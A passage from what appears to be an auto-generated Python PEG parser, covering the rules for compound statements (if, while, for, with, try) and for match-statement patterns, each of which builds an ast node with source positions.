):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('if'))
and
(a := self.named_expression())
and
(literal_1 := self.expect(':'))
and
(b := self.block())
and
(c := self.elif_stmt())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . If ( test = a , body = b , orelse = c or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('if'))
and
(a := self.named_expression())
and
(literal_1 := self.expect(':'))
and
(b := self.block())
and
(c := self.else_block(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . If ( test = a , body = b , orelse = c or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def elif_stmt(self) -> Optional[List [ast . If]]:
# elif_stmt: invalid_elif_stmt | 'elif' named_expression ':' block elif_stmt | 'elif' named_expression ':' block else_block?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_elif_stmt := self.invalid_elif_stmt())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('elif'))
and
(a := self.named_expression())
and
(literal_1 := self.expect(':'))
and
(b := self.block())
and
(c := self.elif_stmt())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return [ast . If ( test = a , body = b , orelse = c , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )]
self._reset(mark)
if (
(literal := self.expect('elif'))
and
(a := self.named_expression())
and
(literal_1 := self.expect(':'))
and
(b := self.block())
and
(c := self.else_block(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return [ast . If ( test = a , body = b , orelse = c or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )]
self._reset(mark)
return None
@memoize
def else_block(self) -> Optional[list]:
# else_block: invalid_else_stmt | 'else' &&':' block
mark = self._mark()
if (
(invalid_else_stmt := self.invalid_else_stmt())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('else'))
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(b := self.block())
):
return b
self._reset(mark)
return None
@memoize
def while_stmt(self) -> Optional[ast . While]:
# while_stmt: invalid_while_stmt | 'while' named_expression ':' block else_block?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_while_stmt := self.invalid_while_stmt())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('while'))
and
(a := self.named_expression())
and
(literal_1 := self.expect(':'))
and
(b := self.block())
and
(c := self.else_block(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . While ( test = a , body = b , orelse = c or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def for_stmt(self) -> Optional[Union [ast . For , ast . AsyncFor]]:
# for_stmt: invalid_for_stmt | 'for' star_targets 'in' ~ star_expressions &&':' TYPE_COMMENT? block else_block? | 'async' 'for' star_targets 'in' ~ star_expressions ':' TYPE_COMMENT? block else_block? | invalid_for_target
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_for_stmt := self.invalid_for_stmt())
):
return None # pragma: no cover
self._reset(mark)
cut = False
if (
(literal := self.expect('for'))
and
(t := self.star_targets())
and
(literal_1 := self.expect('in'))
and
(cut := True)
and
(ex := self.star_expressions())
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(tc := self.type_comment(),)
and
(b := self.block())
and
(el := self.else_block(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . For ( target = t , iter = ex , body = b , orelse = el or [] , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if cut: return None
cut = False
if (
(literal := self.expect('async'))
and
(literal_1 := self.expect('for'))
and
(t := self.star_targets())
and
(literal_2 := self.expect('in'))
and
(cut := True)
and
(ex := self.star_expressions())
and
(literal_3 := self.expect(':'))
and
(tc := self.type_comment(),)
and
(b := self.block())
and
(el := self.else_block(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 5 ) , "Async for loops are" , ast . AsyncFor ( target = t , iter = ex , body = b , orelse = el or [] , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if cut: return None
if (
(invalid_for_target := self.invalid_for_target())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def with_stmt(self) -> Optional[Union [ast . With , ast . AsyncWith]]:
# with_stmt: invalid_with_stmt_indent | 'with' '(' ','.with_item+ ','? ')' ':' block | 'with' ','.with_item+ ':' TYPE_COMMENT? block | 'async' 'with' '(' ','.with_item+ ','? ')' ':' block | 'async' 'with' ','.with_item+ ':' TYPE_COMMENT? block | invalid_with_stmt
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_with_stmt_indent := self.invalid_with_stmt_indent())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('with'))
and
(literal_1 := self.expect('('))
and
(a := self._gather_54())
and
(opt := self.expect(','),)
and
(literal_2 := self.expect(')'))
and
(literal_3 := self.expect(':'))
and
(b := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 9 ) , "Parenthesized with items" , ast . With ( items = a , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if (
(literal := self.expect('with'))
and
(a := self._gather_56())
and
(literal_1 := self.expect(':'))
and
(tc := self.type_comment(),)
and
(b := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . With ( items = a , body = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('async'))
and
(literal_1 := self.expect('with'))
and
(literal_2 := self.expect('('))
and
(a := self._gather_58())
and
(opt := self.expect(','),)
and
(literal_3 := self.expect(')'))
and
(literal_4 := self.expect(':'))
and
(b := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 9 ) , "Parenthesized with items" , ast . AsyncWith ( items = a , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if (
(literal := self.expect('async'))
and
(literal_1 := self.expect('with'))
and
(a := self._gather_60())
and
(literal_2 := self.expect(':'))
and
(tc := self.type_comment(),)
and
(b := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 5 ) , "Async with statements are" , ast . AsyncWith ( items = a , body = b , type_comment = tc , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if (
(invalid_with_stmt := self.invalid_with_stmt())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def with_item(self) -> Optional[ast . withitem]:
# with_item: expression 'as' star_target &(',' | ')' | ':') | invalid_with_item | expression
mark = self._mark()
if (
(e := self.expression())
and
(literal := self.expect('as'))
and
(t := self.star_target())
and
self.positive_lookahead(self._tmp_62, )
):
return ast . withitem ( context_expr = e , optional_vars = t )
self._reset(mark)
if (
(invalid_with_item := self.invalid_with_item())
):
return None # pragma: no cover
self._reset(mark)
if (
(e := self.expression())
):
return ast . withitem ( context_expr = e , optional_vars = None )
self._reset(mark)
return None
@memoize
def try_stmt(self) -> Optional[ast . Try]:
# try_stmt: invalid_try_stmt | 'try' &&':' block finally_block | 'try' &&':' block except_block+ else_block? finally_block?
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_try_stmt := self.invalid_try_stmt())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('try'))
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(b := self.block())
and
(f := self.finally_block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Try ( body = b , handlers = [] , orelse = [] , finalbody = f , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('try'))
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(b := self.block())
and
(ex := self._loop1_63())
and
(el := self.else_block(),)
and
(f := self.finally_block(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Try ( body = b , handlers = ex , orelse = el or [] , finalbody = f or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def except_block(self) -> Optional[ast . ExceptHandler]:
# except_block: invalid_except_stmt_indent | 'except' expression ['as' NAME] ':' block | 'except' ':' block | invalid_except_stmt
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(invalid_except_stmt_indent := self.invalid_except_stmt_indent())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('except'))
and
(e := self.expression())
and
(t := self._tmp_64(),)
and
(literal_1 := self.expect(':'))
and
(b := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . ExceptHandler ( type = e , name = t , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('except'))
and
(literal_1 := self.expect(':'))
and
(b := self.block())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . ExceptHandler ( type = None , name = None , body = b , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(invalid_except_stmt := self.invalid_except_stmt())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def finally_block(self) -> Optional[list]:
# finally_block: invalid_finally_stmt | 'finally' &&':' block
mark = self._mark()
if (
(invalid_finally_stmt := self.invalid_finally_stmt())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect('finally'))
and
(forced := self.expect_forced(self.expect(':'), "':'"))
and
(a := self.block())
):
return a
self._reset(mark)
return None
@memoize
def match_stmt(self) -> Optional["ast.Match"]:
# match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT | invalid_match_stmt
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect("match"))
and
(subject := self.subject_expr())
and
(literal_1 := self.expect(':'))
and
(_newline := self.expect('NEWLINE'))
and
(_indent := self.expect('INDENT'))
and
(cases := self._loop1_65())
and
(_dedent := self.expect('DEDENT'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Match ( subject = subject , cases = cases , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(invalid_match_stmt := self.invalid_match_stmt())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def subject_expr(self) -> Optional[Any]:
# subject_expr: star_named_expression ',' star_named_expressions? | named_expression
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(value := self.star_named_expression())
and
(literal := self.expect(','))
and
(values := self.star_named_expressions(),)
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return self . check_version ( ( 3 , 10 ) , "Pattern matching is" , ast . Tuple ( elts = [value] + ( values or [] ) , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) )
self._reset(mark)
if (
(e := self.named_expression())
):
return self . check_version ( ( 3 , 10 ) , "Pattern matching is" , e )
self._reset(mark)
return None
@memoize
def case_block(self) -> Optional["ast.match_case"]:
# case_block: invalid_case_block | "case" patterns guard? ':' block
mark = self._mark()
if (
(invalid_case_block := self.invalid_case_block())
):
return None # pragma: no cover
self._reset(mark)
if (
(literal := self.expect("case"))
and
(pattern := self.patterns())
and
(guard := self.guard(),)
and
(literal_1 := self.expect(':'))
and
(body := self.block())
):
return ast . match_case ( pattern = pattern , guard = guard , body = body )
self._reset(mark)
return None
@memoize
def guard(self) -> Optional[Any]:
# guard: 'if' named_expression
mark = self._mark()
if (
(literal := self.expect('if'))
and
(guard := self.named_expression())
):
return guard
self._reset(mark)
return None
@memoize
def patterns(self) -> Optional[Any]:
# patterns: open_sequence_pattern | pattern
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(patterns := self.open_sequence_pattern())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchSequence ( patterns = patterns , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(pattern := self.pattern())
):
return pattern
self._reset(mark)
return None
@memoize
def pattern(self) -> Optional[Any]:
# pattern: as_pattern | or_pattern
mark = self._mark()
if (
(as_pattern := self.as_pattern())
):
return as_pattern
self._reset(mark)
if (
(or_pattern := self.or_pattern())
):
return or_pattern
self._reset(mark)
return None
@memoize
def as_pattern(self) -> Optional["ast.MatchAs"]:
# as_pattern: or_pattern 'as' pattern_capture_target | invalid_as_pattern
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(pattern := self.or_pattern())
and
(literal := self.expect('as'))
and
(target := self.pattern_capture_target())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchAs ( pattern = pattern , name = target , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(invalid_as_pattern := self.invalid_as_pattern())
):
return None # pragma: no cover
self._reset(mark)
return None
@memoize
def or_pattern(self) -> Optional["ast.MatchOr"]:
# or_pattern: '|'.closed_pattern+
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(patterns := self._gather_66())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchOr ( patterns = patterns , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset ) if len ( patterns ) > 1 else patterns [0]
self._reset(mark)
return None
@memoize
def closed_pattern(self) -> Optional[Any]:
# closed_pattern: literal_pattern | capture_pattern | wildcard_pattern | value_pattern | group_pattern | sequence_pattern | mapping_pattern | class_pattern
mark = self._mark()
if (
(literal_pattern := self.literal_pattern())
):
return literal_pattern
self._reset(mark)
if (
(capture_pattern := self.capture_pattern())
):
return capture_pattern
self._reset(mark)
if (
(wildcard_pattern := self.wildcard_pattern())
):
return wildcard_pattern
self._reset(mark)
if (
(value_pattern := self.value_pattern())
):
return value_pattern
self._reset(mark)
if (
(group_pattern := self.group_pattern())
):
return group_pattern
self._reset(mark)
if (
(sequence_pattern := self.sequence_pattern())
):
return sequence_pattern
self._reset(mark)
if (
(mapping_pattern := self.mapping_pattern())
):
return mapping_pattern
self._reset(mark)
if (
(class_pattern := self.class_pattern())
):
return class_pattern
self._reset(mark)
return None
@memoize
def literal_pattern(self) -> Optional[Any]:
# literal_pattern: signed_number !('+' | '-') | complex_number | strings | 'None' | 'True' | 'False'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(value := self.signed_number())
and
self.negative_lookahead(self._tmp_68, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchValue ( value = value , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(value := self.complex_number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchValue ( value = value , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(value := self.strings())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchValue ( value = value , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('None'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchSingleton ( value = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('True'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchSingleton ( value = True , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('False'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchSingleton ( value = False , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def literal_expr(self) -> Optional[Any]:
# literal_expr: signed_number !('+' | '-') | complex_number | strings | 'None' | 'True' | 'False'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(signed_number := self.signed_number())
and
self.negative_lookahead(self._tmp_69, )
):
return signed_number
self._reset(mark)
if (
(complex_number := self.complex_number())
):
return complex_number
self._reset(mark)
if (
(strings := self.strings())
):
return strings
self._reset(mark)
if (
(literal := self.expect('None'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('True'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = True , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('False'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = False , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def complex_number(self) -> Optional[Any]:
# complex_number: signed_real_number '+' imaginary_number | signed_real_number '-' imaginary_number
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(real := self.signed_real_number())
and
(literal := self.expect('+'))
and
(imag := self.imaginary_number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = real , op = ast . Add ( ) , right = imag , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(real := self.signed_real_number())
and
(literal := self.expect('-'))
and
(imag := self.imaginary_number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . BinOp ( left = real , op = ast . Sub ( ) , right = imag , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def signed_number(self) -> Optional[Any]:
# signed_number: NUMBER | '-' NUMBER
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(a := self.number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = ast . literal_eval ( a . string ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('-'))
and
(a := self.number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . UnaryOp ( op = ast . USub ( ) , operand = ast . Constant ( value = ast . literal_eval ( a . string ) , lineno = a . start [0] , col_offset = a . start [1] , end_lineno = a . end [0] , end_col_offset = a . end [1] ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
return None
@memoize
def signed_real_number(self) -> Optional[Any]:
# signed_real_number: real_number | '-' real_number
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(real_number := self.real_number())
):
return real_number
self._reset(mark)
if (
(literal := self.expect('-'))
and
(real := self.real_number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . UnaryOp ( op = ast . USub ( ) , operand = real , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def real_number(self) -> Optional[ast . Constant]:
# real_number: NUMBER
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(real := self.number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = self . ensure_real ( real . string ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def imaginary_number(self) -> Optional[ast . Constant]:
# imaginary_number: NUMBER
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(imag := self.number())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Constant ( value = self . ensure_imaginary ( imag . string ) , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def capture_pattern(self) -> Optional[Any]:
# capture_pattern: pattern_capture_target
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(target := self.pattern_capture_target())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchAs ( pattern = None , name = target , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def pattern_capture_target(self) -> Optional[str]:
# pattern_capture_target: !"_" NAME !('.' | '(' | '=')
mark = self._mark()
if (
self.negative_lookahead(self.expect, "_")
and
(name := self.name())
and
self.negative_lookahead(self._tmp_70, )
):
return name . string
self._reset(mark)
return None
@memoize
def wildcard_pattern(self) -> Optional["ast.MatchAs"]:
# wildcard_pattern: "_"
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect("_"))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchAs ( pattern = None , target = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def value_pattern(self) -> Optional["ast.MatchValue"]:
# value_pattern: attr !('.' | '(' | '=')
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(attr := self.attr())
and
self.negative_lookahead(self._tmp_71, )
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchValue ( value = attr , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize_left_rec
def attr(self) -> Optional[ast . Attribute]:
# attr: name_or_attr '.' NAME
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(value := self.name_or_attr())
and
(literal := self.expect('.'))
and
(attr := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Attribute ( value = value , attr = attr . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@logger
def name_or_attr(self) -> Optional[Any]:
# name_or_attr: attr | NAME
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(attr := self.attr())
):
return attr
self._reset(mark)
if (
(name := self.name())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . Name ( id = name . string , ctx = Load , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def group_pattern(self) -> Optional[Any]:
# group_pattern: '(' pattern ')'
mark = self._mark()
if (
(literal := self.expect('('))
and
(pattern := self.pattern())
and
(literal_1 := self.expect(')'))
):
return pattern
self._reset(mark)
return None
@memoize
def sequence_pattern(self) -> Optional["ast.MatchSequence"]:
# sequence_pattern: '[' maybe_sequence_pattern? ']' | '(' open_sequence_pattern? ')'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('['))
and
(patterns := self.maybe_sequence_pattern(),)
and
(literal_1 := self.expect(']'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchSequence ( patterns = patterns or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('('))
and
(patterns := self.open_sequence_pattern(),)
and
(literal_1 := self.expect(')'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchSequence ( patterns = patterns or [] , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def open_sequence_pattern(self) -> Optional[Any]:
# open_sequence_pattern: maybe_star_pattern ',' maybe_sequence_pattern?
mark = self._mark()
if (
(pattern := self.maybe_star_pattern())
and
(literal := self.expect(','))
and
(patterns := self.maybe_sequence_pattern(),)
):
return [pattern] + ( patterns or [] )
self._reset(mark)
return None
@memoize
def maybe_sequence_pattern(self) -> Optional[Any]:
# maybe_sequence_pattern: ','.maybe_star_pattern+ ','?
mark = self._mark()
if (
(patterns := self._gather_72())
and
(opt := self.expect(','),)
):
return patterns
self._reset(mark)
return None
@memoize
def maybe_star_pattern(self) -> Optional[Any]:
# maybe_star_pattern: star_pattern | pattern
mark = self._mark()
if (
(star_pattern := self.star_pattern())
):
return star_pattern
self._reset(mark)
if (
(pattern := self.pattern())
):
return pattern
self._reset(mark)
return None
@memoize
def star_pattern(self) -> Optional[Any]:
# star_pattern: '*' pattern_capture_target | '*' wildcard_pattern
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('*'))
and
(target := self.pattern_capture_target())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchStar ( name = target , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('*'))
and
(wildcard_pattern := self.wildcard_pattern())
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchStar ( target = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
return None
@memoize
def mapping_pattern(self) -> Optional[Any]:
# mapping_pattern: '{' '}' | '{' double_star_pattern ','? '}' | '{' items_pattern ',' double_star_pattern ','? '}' | '{' items_pattern ','? '}'
mark = self._mark()
tok = self._tokenizer.peek()
start_lineno, start_col_offset = tok.start
if (
(literal := self.expect('{'))
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchMapping ( keys = [] , patterns = [] , rest = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('{'))
and
(rest := self.double_star_pattern())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchMapping ( keys = [] , patterns = [] , rest = rest , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset )
self._reset(mark)
if (
(literal := self.expect('{'))
and
(items := self.items_pattern())
and
(literal_1 := self.expect(','))
and
(rest := self.double_star_pattern())
and
(opt := self.expect(','),)
and
(literal_2 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchMapping ( keys = [k for k , _ in items] , patterns = [p for _ , p in items] , rest = rest , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
if (
(literal := self.expect('{'))
and
(items := self.items_pattern())
and
(opt := self.expect(','),)
and
(literal_1 := self.expect('}'))
):
tok = self._tokenizer.get_last_non_whitespace_token()
end_lineno, end_col_offset = tok.end
return ast . MatchMapping ( keys = [k for k , _ in items] , patterns = [p for _ , p in items] , rest = None , lineno=start_lineno, col_offset=start_col_offset, end_lineno=end_lineno, end_col_offset=end_col_offset , )
self._reset(mark)
return None
@memoize
